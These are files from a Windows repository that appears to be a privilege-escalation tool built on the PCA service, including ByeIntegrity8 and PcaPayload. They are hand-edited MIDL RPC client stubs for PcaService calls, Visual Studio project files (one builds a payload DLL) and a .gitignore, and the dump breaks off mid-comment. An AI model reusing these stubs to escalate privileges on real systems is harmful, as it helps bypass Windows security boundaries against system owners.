/ByeIntegrity8/pcasvc7_c.c:
--------------------------------------------------------------------------------
1 |
2 | /*
3 | * I HAVE EDITED THIS FILE BY HAND IN ORDER TO MAKE THIS WORK
4 | * THIS IS NOT THE PURE OUTPUT OF MIDL.EXE
5 | *
6 | * IF YOU ARE COMPILING THE IDL YOURSELF YOU MUST EDIT THE PROCEDURE
7 | * NUMBER IN THIS GENERATED FILE IN ORDER FOR THE CALL TO WORK
8 | */
9 |
10 | /* this ALWAYS GENERATED file contains the RPC client stubs */
11 |
12 |
13 | /* File created by MIDL compiler version 8.01.0622 */
14 | /* at Mon Jan 18 19:14:07 2038
15 | */
16 | /* Compiler settings for pcasvc7.idl, pcasvc7.acf:
17 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
18 | protocol : dce , ms_ext, c_ext, robust
19 | error checks: allocation ref bounds_check enum stub_data
20 | VC __declspec() decoration level:
21 | __declspec(uuid()), __declspec(selectany), __declspec(novtable)
22 | DECLSPEC_UUID(), MIDL_INTERFACE()
23 | */
24 | /* @@MIDL_FILE_HEADING( ) */
25 |
26 | #if defined(_M_AMD64)
27 |
28 |
29 | #pragma warning( disable: 4049 ) /* more than 64k source lines */
30 | #if _MSC_VER >= 1200
31 | #pragma warning(push)
32 | #endif
33 |
34 | #pragma warning( disable: 4211 ) /* redefine extern to static */
35 | #pragma warning( disable: 4232 ) /* dllimport identity*/
36 | #pragma warning( disable: 4024 ) /* array to pointer mapping*/
37 |
38 | #include
39 |
40 | #include "pcasvc7.h"
41 |
42 | #define TYPE_FORMAT_STRING_SIZE 7
43 | #define PROC_FORMAT_STRING_SIZE 55
44 | #define EXPR_FORMAT_STRING_SIZE 1
45 | #define TRANSMIT_AS_TABLE_SIZE 0
46 | #define WIRE_MARSHAL_TABLE_SIZE 0
47 |
48 | typedef struct _pcasvc7_MIDL_TYPE_FORMAT_STRING
49 | {
50 | short Pad;
51 | unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];
52 | } pcasvc7_MIDL_TYPE_FORMAT_STRING;
53 |
54 | typedef struct _pcasvc7_MIDL_PROC_FORMAT_STRING
55 | {
56 | short Pad;
57 | unsigned char Format[ PROC_FORMAT_STRING_SIZE ];
58 | } pcasvc7_MIDL_PROC_FORMAT_STRING;
59 |
60 | typedef struct _pcasvc7_MIDL_EXPR_FORMAT_STRING
61 | {
62 | long Pad;
63 | unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];
64 | } pcasvc7_MIDL_EXPR_FORMAT_STRING;
65 |
66 |
67 | static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax =
68 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};
69 |
70 |
71 | extern const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString;
72 | extern const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString;
73 | extern const pcasvc7_MIDL_EXPR_FORMAT_STRING pcasvc7__MIDL_ExprFormatString;
74 |
75 | #define GENERIC_BINDING_TABLE_SIZE 0
76 |
77 |
78 | /* Standard interface: PcaService7, ver. 1.0,
79 | GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */
80 |
81 |
82 |
/* Interface identity sent on the wire: the uuid/version from pcasvc7.idl
 * (shared with pcasvc.idl) plus the DCE NDR transfer syntax. Per this file's
 * header, the hand edit is the procedure number in
 * pcasvc7__MIDL_ProcFormatString below, not this table. */
static const RPC_CLIENT_INTERFACE PcaService7___RpcClientInterface =
{
    sizeof(RPC_CLIENT_INTERFACE),
    {{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},
    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
    0,
    0,
    0,
    0,
    0,
    0x00000000
};
RPC_IF_HANDLE PcaService7_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService7___RpcClientInterface;
96 |
97 | extern const MIDL_STUB_DESC PcaService7_StubDesc;
98 |
99 | static RPC_BINDING_HANDLE PcaService7__MIDL_AutoBindHandle;
100 |
101 |
/*
 * Client stub: marshals the arguments according to
 * pcasvc7__MIDL_ProcFormatString and issues the call over bindingHandle with
 * NdrClientCall2. The procedure number inside that format string was edited
 * by hand to match PcaSvc's opnum on Windows 7 (see this file's header);
 * MIDL would otherwise emit the procedure's index within pcasvc7.idl, and the
 * call would not reach the intended server routine. Returns the long the
 * server returns.
 */
long RAiNotifyUserCallbackExceptionProcess(
    handle_t bindingHandle,
    /* [string][in] */ wchar_t *exePathName,
    /* [in] */ long unknown0,
    /* [in] */ long processId)
{

    CLIENT_CALL_RETURN _RetVal;

    _RetVal = NdrClientCall2(
        ( PMIDL_STUB_DESC )&PcaService7_StubDesc,
        (PFORMAT_STRING) &pcasvc7__MIDL_ProcFormatString.Format[0],
        bindingHandle,
        exePathName,
        unknown0,
        processId);
    return ( long )_RetVal.Simple;

}
121 |
122 |
123 | #if !defined(__RPC_WIN64__)
124 | #error Invalid build platform for this stub.
125 | #endif
126 |
/* Oicf procedure description consumed by NdrClientCall2: a header (procedure
 * number, stack size, binding, flags) followed by one entry per parameter and
 * one for the return value. The numbers in the leading comments are byte
 * offsets into Format[]. */
static const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString =
{
    0,
    {

    /* Procedure RAiNotifyUserCallbackExceptionProcess */

            0x0,        /* 0 */
            0x48,       /* Old Flags:  */
/*  2 */    NdrFcLong( 0x0 ),   /* 0 */
/*  6 */    NdrFcShort( 0x4 ),  /* 4 */
            /* HAND-EDITED (see file header): this is the opnum PcaSvc expects
             * for RAiNotifyUserCallbackExceptionProcess. MIDL emits the
             * procedure's index within the IDL here, so re-apply this value
             * after regenerating from pcasvc7.idl. */
/*  8 */    NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */
/* 10 */    0x32,       /* FC_BIND_PRIMITIVE */
            0x0,        /* 0 */
/* 12 */    NdrFcShort( 0x0 ),  /* X64 Stack size/offset = 0 */
/* 14 */    NdrFcShort( 0x10 ), /* 16 */
/* 16 */    NdrFcShort( 0x8 ),  /* 8 */
/* 18 */    0x46,       /* Oi2 Flags:  clt must size, has return, has ext, */
            0x4,        /* 4 */
/* 20 */    0xa,        /* 10 */
            0x1,        /* Ext Flags:  new corr desc, */
/* 22 */    NdrFcShort( 0x0 ),  /* 0 */
/* 24 */    NdrFcShort( 0x0 ),  /* 0 */
/* 26 */    NdrFcShort( 0x0 ),  /* 0 */
/* 28 */    NdrFcShort( 0x0 ),  /* 0 */

    /* Parameter exePathName */

/* 30 */    NdrFcShort( 0x10b ),    /* Flags:  must size, must free, in, simple ref, */
/* 32 */    NdrFcShort( 0x8 ),  /* X64 Stack size/offset = 8 */
/* 34 */    NdrFcShort( 0x4 ),  /* Type Offset=4 */

    /* Parameter unknown0 */

/* 36 */    NdrFcShort( 0x48 ), /* Flags:  in, base type, */
/* 38 */    NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */
/* 40 */    0x8,        /* FC_LONG */
            0x0,        /* 0 */

    /* Parameter processId */

/* 42 */    NdrFcShort( 0x48 ), /* Flags:  in, base type, */
/* 44 */    NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */
/* 46 */    0x8,        /* FC_LONG */
            0x0,        /* 0 */

    /* Return value */

/* 48 */    NdrFcShort( 0x70 ), /* Flags:  out, return, base type, */
/* 50 */    NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */
/* 52 */    0x8,        /* FC_LONG */
            0x0,        /* 0 */

            0x0
        }
    };
183 |
/* -Oicf type format string for the PcaService7 interface. Offset 2 is a
 * ref pointer (FC_RP — NULL not permitted) to the conformant wide string at
 * offset 4, which is the type the exePathName parameter descriptor refers
 * to. Contrast the PcaService stub in pcasvc_c.c, whose string parameters
 * are [unique] (FC_UP) and may be NULL. Generated data — do not hand-edit. */
static const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString =
{
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x11, 0x8, /* FC_RP [simple_pointer] */
/* 4 */
0x25, /* FC_C_WSTRING */
0x5c, /* FC_PAD */

0x0
}
};
198 |
/* Byte offset of each procedure inside pcasvc7__MIDL_ProcFormatString,
 * indexed by procedure index. A single entry: the only procedure starts at
 * byte 0. The stub above bypasses this table and passes &Format[0] itself. */
static const unsigned short PcaService7_FormatStringOffsetTable[] =
{
0
};
203 |
204 |
/* MIDL_STUB_DESC for the PcaService7 client stub (DCE NDR only — note the
 * 0x50002 NDR library version and the zero proxy/server-info slot, unlike
 * the dual-syntax PcaService descriptor in pcasvc_c.c).
 * pfnAllocate/pfnFree resolve through the MIDL_user_allocate/MIDL_user_free
 * macros to midl_user_allocate/midl_user_free in byeintegrity8.c, so every
 * buffer the NDR engine allocates on behalf of this stub comes from the
 * process heap. Generated data — do not hand-edit. */
static const MIDL_STUB_DESC PcaService7_StubDesc =
{
(void *)& PcaService7___RpcClientInterface,  /* RpcInterfaceInformation */
MIDL_user_allocate,                          /* pfnAllocate */
MIDL_user_free,                              /* pfnFree */
&PcaService7__MIDL_AutoBindHandle,           /* implicit handle info (unused: explicit handle) */
0,
0,
0,
0,
pcasvc7__MIDL_TypeFormatString.Format,       /* pFormatTypes */
1, /* -error bounds_check flag */
0x50002, /* Ndr library version */
0,
0x801026e, /* MIDL Version 8.1.622 */
0,
0,
0, /* notify & notify_flag routine table */
0x1, /* MIDL flag */
0, /* cs routines */
0, /* proxy/server info */
0
};
228 | #if _MSC_VER >= 1200
229 | #pragma warning(pop)
230 | #endif
231 |
232 |
233 | #endif /* defined(_M_AMD64)*/
234 |
235 |
--------------------------------------------------------------------------------
/PcaPayload/PcaPayload.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {2702ad93-dc30-427f-aa64-deb4cc2ea0a0}
25 | PcaPayload
26 | 10.0
27 |
28 |
29 |
30 | DynamicLibrary
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | DynamicLibrary
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | DynamicLibrary
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | DynamicLibrary
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 | MultiThreaded
106 |
107 |
108 | Console
109 | true
110 | true
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 | true
118 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
119 | true
120 |
121 |
122 | Console
123 | true
124 |
125 |
126 |
127 |
128 | Level3
129 | true
130 | true
131 | true
132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
133 | true
134 | MultiThreaded
135 |
136 |
137 | Console
138 | true
139 | true
140 | true
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Oo]ut/
33 | [Ll]og/
34 | [Ll]ogs/
35 |
36 | # Visual Studio 2015/2017 cache/options directory
37 | .vs/
38 | # Uncomment if you have tasks that create the project's static files in wwwroot
39 | #wwwroot/
40 |
41 | # Visual Studio 2017 auto generated files
42 | Generated\ Files/
43 |
44 | # MSTest test Results
45 | [Tt]est[Rr]esult*/
46 | [Bb]uild[Ll]og.*
47 |
48 | # NUnit
49 | *.VisualState.xml
50 | TestResult.xml
51 | nunit-*.xml
52 |
53 | # Build Results of an ATL Project
54 | [Dd]ebugPS/
55 | [Rr]eleasePS/
56 | dlldata.c
57 |
58 | # Benchmark Results
59 | BenchmarkDotNet.Artifacts/
60 |
61 | # .NET Core
62 | project.lock.json
63 | project.fragment.lock.json
64 | artifacts/
65 |
66 | # ASP.NET Scaffolding
67 | ScaffoldingReadMe.txt
68 |
69 | # StyleCop
70 | StyleCopReport.xml
71 |
72 | # Files built by Visual Studio
73 | *_i.c
74 | *_p.c
75 | *_h.h
76 | *.ilk
77 | *.meta
78 | *.obj
79 | *.iobj
80 | *.pch
81 | *.pdb
82 | *.ipdb
83 | *.pgc
84 | *.pgd
85 | *.rsp
86 | *.sbr
87 | *.tlb
88 | *.tli
89 | *.tlh
90 | *.tmp
91 | *.tmp_proj
92 | *_wpftmp.csproj
93 | *.log
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary; generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produce more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 |
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 |
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 |
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 |
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 |
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 |
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 |
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 |
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 |
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 |
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 |
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 |
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 |
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 |
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 |
288 | # Visual Studio 6 build log
289 | *.plg
290 |
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 |
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 |
297 | # Visual Studio LightSwitch build output
298 | **/*.HTMLClient/GeneratedArtifacts
299 | **/*.DesktopClient/GeneratedArtifacts
300 | **/*.DesktopClient/ModelManifest.xml
301 | **/*.Server/GeneratedArtifacts
302 | **/*.Server/ModelManifest.xml
303 | _Pvt_Extensions
304 |
305 | # Paket dependency manager
306 | .paket/paket.exe
307 | paket-files/
308 |
309 | # FAKE - F# Make
310 | .fake/
311 |
312 | # CodeRush personal settings
313 | .cr/personal
314 |
315 | # Python Tools for Visual Studio (PTVS)
316 | __pycache__/
317 | *.pyc
318 |
319 | # Cake - Uncomment if you are using it
320 | # tools/**
321 | # !tools/packages.config
322 |
323 | # Tabs Studio
324 | *.tss
325 |
326 | # Telerik's JustMock configuration file
327 | *.jmconfig
328 |
329 | # BizTalk build output
330 | *.btp.cs
331 | *.btm.cs
332 | *.odx.cs
333 | *.xsd.cs
334 |
335 | # OpenCover UI analysis results
336 | OpenCover/
337 |
338 | # Azure Stream Analytics local run output
339 | ASALocalRun/
340 |
341 | # MSBuild Binary and Structured Log
342 | *.binlog
343 |
344 | # NVidia Nsight GPU debugger configuration file
345 | *.nvuser
346 |
347 | # MFractors (Xamarin productivity tool) working folder
348 | .mfractor/
349 |
350 | # Local History for Visual Studio
351 | .localhistory/
352 |
353 | # BeatPulse healthcheck temp database
354 | healthchecksdb
355 |
356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
357 | MigrationBackup/
358 |
359 | # Ionide (cross platform F# VS Code tools) working folder
360 | .ionide/
361 |
362 | # Fody - auto-generated XML schema
363 | FodyWeavers.xsd
--------------------------------------------------------------------------------
/ByeIntegrity8/ByeIntegrity8.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {f04acb28-ca8b-40a8-9d8b-3d2550bce0cd}
25 | ByeIntegrity8
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 | taskschd.lib;rpcrt4.lib;%(AdditionalDependencies)
96 |
97 |
98 |
99 |
100 | Level3
101 | true
102 | true
103 | true
104 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
105 | true
106 |
107 |
108 | Console
109 | true
110 | true
111 | true
112 | taskschd.lib;rpcrt4.lib;%(AdditionalDependencies)
113 |
114 |
115 |
116 |
117 | Level3
118 | true
119 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 |
122 |
123 | Console
124 | true
125 | taskschd.lib;rpcrt4.lib;%(AdditionalDependencies)
126 |
127 |
128 |
129 |
130 | Level3
131 | true
132 | true
133 | true
134 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
135 | true
136 |
137 |
138 | Console
139 | true
140 | true
141 | true
142 | taskschd.lib;rpcrt4.lib;%(AdditionalDependencies)
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 | true
163 | true
164 | true
165 | true
166 | false
167 | false
168 | false
169 | false
170 |
171 |
172 |
173 |
174 | true
175 | false
176 | true
177 | false
178 | true
179 | false
180 | true
181 | false
182 |
183 |
184 |
185 |
186 | %(Filename).h
187 | None
188 | %(Filename).h
189 | None
190 | %(Filename).h
191 | None
192 | %(Filename).h
193 | None
194 | true
195 | true
196 | true
197 | true
198 |
199 |
200 |
201 |
202 |
203 |
--------------------------------------------------------------------------------
/ByeIntegrity8/pcasvc_c.c:
--------------------------------------------------------------------------------
1 |
2 |
3 | /* this ALWAYS GENERATED file contains the RPC client stubs */
4 |
5 |
6 | /* File created by MIDL compiler version 8.01.0622 */
7 | /* at Mon Jan 18 19:14:07 2038
8 | */
9 | /* Compiler settings for pcasvc.idl:
10 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
11 | protocol : all , ms_ext, c_ext, robust
12 | error checks: allocation ref bounds_check enum stub_data
13 | VC __declspec() decoration level:
14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable)
15 | DECLSPEC_UUID(), MIDL_INTERFACE()
16 | */
17 | /* @@MIDL_FILE_HEADING( ) */
18 |
19 | #if defined(_M_AMD64)
20 |
21 |
22 | #if _MSC_VER >= 1200
23 | #pragma warning(push)
24 | #endif
25 |
26 | #pragma warning( disable: 4211 ) /* redefine extern to static */
27 | #pragma warning( disable: 4232 ) /* dllimport identity*/
28 | #pragma warning( disable: 4024 ) /* array to pointer mapping*/
29 |
30 | #include
31 |
32 | #include "pcasvc.h"
33 |
/* Byte counts of the -Oicf format strings defined further down in this
 * file. MIDL emits them so the wrapper structs below can hold each table by
 * value; if the IDL changes, both the macros and the tables are regenerated
 * together. (73 = the bytes listed in pcasvc__MIDL_ProcFormatString,
 * 7 = the bytes in pcasvc__MIDL_TypeFormatString.) */
#define TYPE_FORMAT_STRING_SIZE 7
#define PROC_FORMAT_STRING_SIZE 73
#define EXPR_FORMAT_STRING_SIZE 1
#define TRANSMIT_AS_TABLE_SIZE 0
#define WIRE_MARSHAL_TABLE_SIZE 0

/* Wrapper structs: a leading Pad followed by the raw NDR format bytes, so
 * each table is one static const object. The offsets quoted in the tables'
 * comments are counted from Format[0], not from the struct start. */
typedef struct _pcasvc_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];
} pcasvc_MIDL_TYPE_FORMAT_STRING;

typedef struct _pcasvc_MIDL_PROC_FORMAT_STRING
{
short Pad;
unsigned char Format[ PROC_FORMAT_STRING_SIZE ];
} pcasvc_MIDL_PROC_FORMAT_STRING;

/* Expression format string: no size-is/length-is expressions in this IDL,
 * so the table is a single byte and is never defined in this file. */
typedef struct _pcasvc_MIDL_EXPR_FORMAT_STRING
{
long Pad;
unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];
} pcasvc_MIDL_EXPR_FORMAT_STRING;
57 |
58 |
/* Transfer syntaxes this client can negotiate: the DCE NDR syntax
 * (8A885D04-1CEB-11C9-9FE8-08002B104860 v2.0) and NDR64
 * (71710533-BEBA-4937-8319-B5DBEF9CCC36 v1.0). Both are listed again in
 * PcaService_SyntaxInfo near the end of the file; the runtime picks one at
 * bind time. */
static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax =
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};

static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax =
{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};
64 |
65 |
66 |
/* Forward declarations of the format tables defined later in the file; the
 * stub descriptor and proxy info reference them before their definitions.
 * MIDL declares them extern and then defines them static — hence the
 * warning 4211 suppression at the top of the file. The expression format
 * string is declared but never defined here (EXPR_FORMAT_STRING_SIZE is 1). */
extern const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString;
extern const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString;
extern const pcasvc_MIDL_EXPR_FORMAT_STRING pcasvc__MIDL_ExprFormatString;

/* No [implicit_handle]/generic binding routines in this IDL. */
#define GENERIC_BINDING_TABLE_SIZE 0
72 |
73 |
74 | /* Standard interface: PcaService, ver. 1.0,
75 | GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */
76 |
/* Defined at the bottom of the file; referenced by the interface record and
 * by the RAiMonitorProcess stub (NdrClientCall3 takes it directly). */
extern const MIDL_STUBLESS_PROXY_INFO PcaService_ProxyInfo;


/* Client-side interface record: interface id
 * 0767a036-0d22-48aa-ba69-b619480f38cb v1.0 (the PcaService RPC interface
 * this tool binds to — the identifier a defender would see in RPC/ETW
 * telemetry), DCE NDR as the primary transfer syntax, no dispatch table or
 * endpoints on the client side, and a pointer to the proxy info. The trailing
 * 0x02000000 flag is presumably RPCFLG_HAS_MULTI_SYNTAXES, matching the
 * two-entry PcaService_SyntaxInfo — confirm against rpcndr.h if it matters. */
static const RPC_CLIENT_INTERFACE PcaService___RpcClientInterface =
{
sizeof(RPC_CLIENT_INTERFACE),
{{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},  /* InterfaceId */
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},  /* TransferSyntax */
0,
0,
0,
0,
&PcaService_ProxyInfo,
0x02000000
};
/* Public handle the caller passes to RpcBinding* APIs / RpcEpResolveBinding. */
RPC_IF_HANDLE PcaService_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService___RpcClientInterface;
93 |
/* Defined after the NDR64 fragments below; needed here by the proxy info. */
extern const MIDL_STUB_DESC PcaService_StubDesc;

/* Implicit-binding slot named in PcaService_StubDesc. RAiMonitorProcess takes
 * an explicit handle_t, so this remains NULL and is presumably never read. */
static RPC_BINDING_HANDLE PcaService__MIDL_AutoBindHandle;
97 |
98 |
/*
 * MIDL-generated client stub for PcaService::RAiMonitorProcess (opnum 0).
 *
 * Forwards every argument to NdrClientCall3 together with the stubless proxy
 * info, which carries both the DCE NDR and the NDR64 descriptions of the
 * call; the runtime marshals with whichever transfer syntax was negotiated
 * on bindingHandle. The stub itself performs no validation.
 *
 * bindingHandle  explicit RPC binding to the PCA service.
 * hProcess       marshalled as a plain 64-bit integer (FC_UINT3264); the stub
 *                does not duplicate or validate the handle, so what the
 *                service does with the value is entirely server-side.
 * unknown0       [in] long; the notes in byeintegrity8.c say the caller
 *                always passes 1.
 * exeFileName,
 * cmdLine,
 * workingDir     [in, string, unique] wide strings — [unique] means NULL is
 *                a legal value for each.
 * flags          [in] long; see the PCA_MONITOR_PROCESS_* notes in
 *                byeintegrity8.c for the caller's guessed meanings.
 *
